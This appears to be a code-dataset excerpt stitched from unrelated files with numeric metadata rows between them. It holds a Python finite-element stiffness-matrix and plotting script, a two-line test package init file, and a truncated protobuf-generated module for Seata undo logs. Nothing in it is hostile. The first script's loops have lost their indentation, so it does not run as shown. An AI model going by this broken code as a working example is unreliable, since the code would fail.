k0[i2*dof+4, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b2*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+4, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b2*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i3*dof+2, i1*dof+2] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b1 - E55*a1)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i1*dof+3] += -Ac1*(Ac1 + Ac2)*(E44*b1 - E45*a1)/(4*(Ac*Ac)*Ae1)
k0[i3*dof+2, i1*dof+4] += -Ac1*(Ac1 + Ac2)*(E45*b1 - E55*a1)/(4*(Ac*Ac)*Ae1)
k0[i3*dof+2, i2*dof+2] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i2*dof+3] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i2*dof+4] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i3*dof+2] += (Ac1*Ac1)*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(4*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+2, i3*dof+3] += (Ac1*Ac1)*c1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+2, i3*dof+4] += (Ac1*Ac1)*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+2, i4*dof+2] += Ac1*Ac2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+2, i4*dof+3] += Ac1*Ac2*c2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+2, i4*dof+4] += Ac1*Ac2*d2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+3, i1*dof+2] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b1 - E55*a1)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i1*dof+3] += -Ac1*c1*(Ac1 + Ac2)*(E44*b1 - E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+3, i1*dof+4] += -Ac1*c1*(Ac1 + Ac2)*(E45*b1 - E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+3, i2*dof+2] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i2*dof+3] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i2*dof+4] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i3*dof+2] += (Ac1*Ac1)*c1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+3, i3*dof+3] += (Ac1*Ac1)*(c1*c1)*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+3, i3*dof+4] += (Ac1*Ac1)*c1*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+3, i4*dof+2] += Ac1*Ac2*c1*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+3, i4*dof+3] += Ac1*Ac2*c1*c2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+3, i4*dof+4] += Ac1*Ac2*c1*d2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+4, i1*dof+2] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b1 - E55*a1)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i1*dof+3] += -Ac1*d1*(Ac1 + Ac2)*(E44*b1 - E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+4, i1*dof+4] += -Ac1*d1*(Ac1 + Ac2)*(E45*b1 - E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+4, i2*dof+2] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i2*dof+3] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i2*dof+4] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i3*dof+2] += (Ac1*Ac1)*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+4, i3*dof+3] += (Ac1*Ac1)*c1*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+4, i3*dof+4] += (Ac1*Ac1)*(d1*d1)*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+4, i4*dof+2] += Ac1*Ac2*d1*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+4, i4*dof+3] += Ac1*Ac2*c2*d1*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+4, i4*dof+4] += Ac1*Ac2*d1*d2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i1*dof+2] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b2 - E55*a2)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i1*dof+3] += -Ac2*(Ac1 + Ac2)*(E44*b2 - E45*a2)/(4*(Ac*Ac)*Ae2)
k0[i4*dof+2, i1*dof+4] += -Ac2*(Ac1 + Ac2)*(E45*b2 - E55*a2)/(4*(Ac*Ac)*Ae2)
k0[i4*dof+2, i2*dof+2] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i2*dof+3] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i2*dof+4] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i3*dof+2] += Ac1*Ac2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i3*dof+3] += Ac1*Ac2*c1*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i3*dof+4] += Ac1*Ac2*d1*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i4*dof+2] += (Ac2*Ac2)*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(4*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+2, i4*dof+3] += (Ac2*Ac2)*c2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+2, i4*dof+4] += (Ac2*Ac2)*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+3, i1*dof+2] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b2 - E55*a2)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i1*dof+3] += -Ac2*c2*(Ac1 + Ac2)*(E44*b2 - E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+3, i1*dof+4] += -Ac2*c2*(Ac1 + Ac2)*(E45*b2 - E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+3, i2*dof+2] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i2*dof+3] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i2*dof+4] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i3*dof+2] += Ac1*Ac2*c2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+3, i3*dof+3] += Ac1*Ac2*c1*c2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+3, i3*dof+4] += Ac1*Ac2*c2*d1*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+3, i4*dof+2] += (Ac2*Ac2)*c2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+3, i4*dof+3] += (Ac2*Ac2)*(c2*c2)*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+3, i4*dof+4] += (Ac2*Ac2)*c2*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+4, i1*dof+2] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b2 - E55*a2)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i1*dof+3] += -Ac2*d2*(Ac1 + Ac2)*(E44*b2 - E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+4, i1*dof+4] += -Ac2*d2*(Ac1 + Ac2)*(E45*b2 - E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+4, i2*dof+2] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i2*dof+3] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i2*dof+4] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i3*dof+2] += Ac1*Ac2*d2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+4, i3*dof+3] += Ac1*Ac2*c1*d2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+4, i3*dof+4] += Ac1*Ac2*d1*d2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+4, i4*dof+2] += (Ac2*Ac2)*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+4, i4*dof+3] += (Ac2*Ac2)*c2*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+4, i4*dof+4] += (Ac2*Ac2)*(d2*d2)*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
print('Atotal:', Atotal)
puvw = 2
# force vector
fext = np.zeros(n*dof, dtype=np.float64)
fext[nodes[3].index*dof + puvw] = 500.
fext[nodes[7].index*dof + puvw] = 1000.
fext[nodes[11].index*dof + puvw] = 1000.
fext[nodes[15].index*dof + puvw] = 500.
#k0[i<j] = k0[i>j]
i, j = np.indices(k0.shape)
print('is_symmetric:', np.allclose(k0[i>j], k0[i<j]))
print('is_symmetric:', k0[i>j].sum(), k0[i<j].sum())
test = is_symmetric(coo_matrix(k0))
print('is_symmetric:', test)
# boundary conditions
for i in [0, 4, 8, 12]:
for j in [0, 1, 2]:
k0[nodes[i].index*dof+j, :] = 0
k0[:, nodes[i].index*dof+j] = 0
k0 = coo_matrix(k0)
u = solve(k0, fext, silent=True)
xcord = np.array([node.pos[0] for node in nodes])
ycord = np.array([node.pos[1] for node in nodes])
wmin = u[puvw::dof].min()
wmax = u[puvw::dof].max()
levels = np.linspace(wmin, wmax, 400)
print(u[puvw::dof].reshape(4, 4))
plt.contourf(xcord.reshape(4, 4), ycord.reshape(4, 4), u[puvw::dof].reshape(4, 4),
levels=levels)
plt.savefig('plot_edge_based_smoothing_domain.png', bbox_inches='tight')
| 138.923844
| 414
| 0.586238
| 32,338
| 153,233
| 2.769002
| 0.01339
| 0.051461
| 0.068614
| 0.02573
| 0.927175
| 0.921636
| 0.916376
| 0.908961
| 0.899435
| 0.890668
| 0
| 0.267944
| 0.147494
| 153,233
| 1,102
| 415
| 139.049909
| 0.417524
| 0.013541
| 0
| 0.085805
| 0
| 0
| 0.001476
| 0.000238
| 0
| 0
| 0
| 0.000907
| 0
| 1
| 0.013771
| false
| 0.001059
| 0.005297
| 0.003178
| 0.036017
| 0.005297
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
95633be6a046a2ae5e44ff7382d7b3f5e948374c
| 91
|
py
|
Python
|
openacademy/tests/__init__.py
|
mapuerta/openacademy-proyect
|
31c7f48f735eb64bd4908ef5194977b05f04383c
|
[
"Apache-2.0"
] | null | null | null |
openacademy/tests/__init__.py
|
mapuerta/openacademy-proyect
|
31c7f48f735eb64bd4908ef5194977b05f04383c
|
[
"Apache-2.0"
] | null | null | null |
openacademy/tests/__init__.py
|
mapuerta/openacademy-proyect
|
31c7f48f735eb64bd4908ef5194977b05f04383c
|
[
"Apache-2.0"
] | null | null | null |
from . import test_global_openacademy_course
from . import test_global_openacademy_session
| 30.333333
| 45
| 0.89011
| 12
| 91
| 6.25
| 0.583333
| 0.266667
| 0.373333
| 0.533333
| 0.826667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087912
| 91
| 2
| 46
| 45.5
| 0.903614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
c2f042c7028cbf4784b5d817a5010de3b0fea9ab
| 36,133
|
py
|
Python
|
seata/rm/datasource/undo/parser/proto/branch_undolog_pb2.py
|
opentrx/seata-python
|
66fb3382217a43effa3d1bc5ec2b62204d499dba
|
[
"Apache-2.0"
] | 8
|
2021-09-09T06:28:08.000Z
|
2022-03-06T04:58:40.000Z
|
seata/rm/datasource/undo/parser/proto/branch_undolog_pb2.py
|
opentrx/seata-python
|
66fb3382217a43effa3d1bc5ec2b62204d499dba
|
[
"Apache-2.0"
] | null | null | null |
seata/rm/datasource/undo/parser/proto/branch_undolog_pb2.py
|
opentrx/seata-python
|
66fb3382217a43effa3d1bc5ec2b62204d499dba
|
[
"Apache-2.0"
] | 4
|
2021-08-23T07:44:27.000Z
|
2022-02-11T08:42:54.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: branch_undolog.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='branch_undolog.proto',
package='seata.rm.datasource.undo.parser.proto',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x14\x62ranch_undolog.proto\x12%seata.rm.datasource.undo.parser.proto\x1a\x19google/protobuf/any.proto\"\x99\x01\n\rBranchUndoLog\x12\x10\n\x03xid\x18\x01 \x01(\tH\x00\x88\x01\x01\x12\x16\n\tbranch_id\x18\x02 \x01(\x03H\x01\x88\x01\x01\x12H\n\rsql_undo_logs\x18\x03 \x03(\x0b\x32\x31.seata.rm.datasource.undo.parser.proto.SQLUndoLogB\x06\n\x04_xidB\x0c\n\n_branch_id\"\xc7\x01\n\nSQLUndoLog\x12\x10\n\x08sql_type\x18\x01 \x01(\x05\x12\x12\n\ntable_name\x18\x02 \x01(\t\x12I\n\x0c\x62\x65\x66ore_image\x18\x03 \x01(\x0b\x32\x33.seata.rm.datasource.undo.parser.proto.TableRecords\x12H\n\x0b\x61\x66ter_image\x18\x04 \x01(\x0b\x32\x33.seata.rm.datasource.undo.parser.proto.TableRecords\"\xa2\x01\n\x0cTableRecords\x12\x44\n\ntable_meta\x18\x01 \x01(\x0b\x32\x30.seata.rm.datasource.undo.parser.proto.TableMeta\x12\x12\n\ntable_name\x18\x02 \x01(\t\x12\x38\n\x04rows\x18\x03 \x03(\x0b\x32*.seata.rm.datasource.undo.parser.proto.Row\"\x95\x03\n\tTableMeta\x12\x12\n\ntable_name\x18\x01 \x01(\t\x12U\n\x0b\x61ll_columns\x18\x02 \x03(\x0b\x32@.seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry\x12S\n\nall_indexs\x18\x03 \x03(\x0b\x32?.seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry\x1a\x64\n\x0f\x41llColumnsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12@\n\x05value\x18\x02 \x01(\x0b\x32\x31.seata.rm.datasource.undo.parser.proto.ColumnMeta:\x02\x38\x01\x1a\x62\n\x0e\x41llIndexsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12?\n\x05value\x18\x02 \x01(\x0b\x32\x30.seata.rm.datasource.undo.parser.proto.IndexMeta:\x02\x38\x01\"\xb6\x03\n\nColumnMeta\x12\x11\n\ttable_cat\x18\x01 \x01(\t\x12\x19\n\x11table_schema_name\x18\x02 \x01(\t\x12\x12\n\ntable_name\x18\x03 \x01(\t\x12\x13\n\x0b\x63olumn_name\x18\x04 \x01(\t\x12\x11\n\tdata_type\x18\x05 \x01(\x05\x12\x16\n\x0e\x64\x61ta_type_name\x18\x06 \x01(\t\x12\x13\n\x0b\x63olumn_size\x18\x07 \x01(\x05\x12\x16\n\x0e\x64\x65\x63imal_digits\x18\x08 \x01(\x05\x12\x16\n\x0enum_prec_radix\x18\t 
\x01(\x05\x12\x11\n\tnull_able\x18\n \x01(\x05\x12\x0f\n\x07remarks\x18\x0b \x01(\t\x12\x12\n\ncolumn_def\x18\x0c \x01(\t\x12\x15\n\rsql_data_type\x18\r \x01(\x05\x12\x18\n\x10sql_datetime_sub\x18\x0e \x01(\x05\x12/\n\x11\x63har_octet_length\x18\x0f \x01(\x0b\x32\x14.google.protobuf.Any\x12\x18\n\x10ordinal_position\x18\x10 \x01(\x05\x12\x13\n\x0bis_nullable\x18\x11 \x01(\t\x12\x18\n\x10is_autoincrement\x18\x12 \x01(\t\"\xf5\x01\n\tIndexMeta\x12\x41\n\x06values\x18\x01 \x03(\x0b\x32\x31.seata.rm.datasource.undo.parser.proto.ColumnMeta\x12\x12\n\nnon_unique\x18\x02 \x01(\x08\x12\x17\n\x0findex_qualifier\x18\x03 \x01(\t\x12\x12\n\nindex_name\x18\x04 \x01(\t\x12\x0c\n\x04type\x18\x05 \x01(\x05\x12\x12\n\nindex_type\x18\x06 \x01(\x05\x12\x13\n\x0b\x61sc_or_desc\x18\x07 \x01(\t\x12\x13\n\x0b\x63\x61rdinality\x18\x08 \x01(\x05\x12\x18\n\x10ordinal_position\x18\t \x01(\x05\"C\n\x03Row\x12<\n\x06\x66ields\x18\x01 \x03(\x0b\x32,.seata.rm.datasource.undo.parser.proto.Field\"D\n\x05\x46ield\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x10\n\x08key_type\x18\x02 \x01(\x05\x12\x0c\n\x04type\x18\x03 \x01(\x05\x12\r\n\x05value\x18\x04 \x01(\tb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_any__pb2.DESCRIPTOR,])
_BRANCHUNDOLOG = _descriptor.Descriptor(
name='BranchUndoLog',
full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='xid', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog.xid', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='branch_id', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog.branch_id', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sql_undo_logs', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog.sql_undo_logs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='_xid', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog._xid',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_branch_id', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog._branch_id',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=91,
serialized_end=244,
)
_SQLUNDOLOG = _descriptor.Descriptor(
name='SQLUndoLog',
full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='sql_type', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.sql_type', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.table_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='before_image', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.before_image', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='after_image', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.after_image', index=3,
